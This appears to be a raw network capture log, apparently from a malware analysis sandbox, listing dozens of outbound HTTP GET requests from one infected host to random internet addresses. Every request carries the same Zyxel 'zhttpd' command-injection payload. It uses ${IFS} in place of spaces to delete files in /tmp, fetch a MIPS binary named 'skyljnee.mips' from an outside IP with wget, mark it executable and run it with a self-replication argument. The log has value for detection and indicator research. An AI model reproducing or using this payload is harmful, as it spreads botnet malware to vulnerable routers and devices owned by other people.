                                                        Jan 28, 2024 10:12:34.056427002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.1433908124.87.200.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056462049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.1434584213.30.155.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056581974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.1449168201.68.69.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056612968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.1447954107.194.60.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:34.056642056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.144744695.200.9.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.060906887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.1451820208.123.62.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.060971022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.1434954158.62.254.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.060995102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.14495725.236.131.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061048985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.1445898194.212.89.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061074018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.145098497.188.32.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061131001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.144737889.110.111.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061161041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.1448574180.58.74.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061213970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.1433270198.208.115.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061264992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.1444876140.107.233.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:35.061434031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.143453234.220.253.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089339972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.145826675.34.113.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089364052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.1439922218.59.238.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089392900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.1447246222.224.12.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089441061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.14337025.179.63.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089469910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        402192.168.2.1433662112.249.26.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089509964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        403192.168.2.1443580109.77.104.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089581013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        404192.168.2.143622483.231.27.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089598894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        405192.168.2.1440490157.32.147.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089610100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        406192.168.2.1444476131.126.235.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089649916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        407192.168.2.144315635.11.9.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089678049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        408192.168.2.144655613.221.104.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089751959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        409192.168.2.145190061.106.188.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089772940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        410192.168.2.1438444186.172.126.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089786053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        411192.168.2.1459424172.208.97.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089838982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        412192.168.2.1439122161.145.84.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089870930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        413192.168.2.145069851.34.155.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089932919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.1435374167.159.90.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.089963913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.1450364196.21.207.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090003014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.1452208187.101.55.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090053082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.1447522194.209.30.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090085030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.1453022126.176.151.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090141058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.143692269.222.170.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090173006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.144815659.26.231.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090214968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.1437920134.141.218.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090250015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.144566649.233.254.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090272903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.145750498.14.217.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090325117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.14602209.211.174.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090358019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.1449190199.14.34.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090411901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.143872070.13.237.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090436935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.1435906158.171.36.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090464115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.143400841.74.131.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090518951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.1451702200.106.183.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090555906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        430192.168.2.1434122201.90.79.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090590954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        431192.168.2.143845648.237.175.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090662956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.1445130177.140.73.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090673923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.143301852.47.104.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090713024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.1443678157.146.194.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090763092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.14565864.203.215.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090775967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.145008277.255.27.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090835094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.1454204152.155.4.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090864897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.144972687.99.126.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090882063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.1437644187.241.232.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090928078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.1436580148.150.207.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090950012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.1453492155.57.222.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.090989113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.1449970194.92.89.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091049910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.1435848206.14.42.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.091074944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
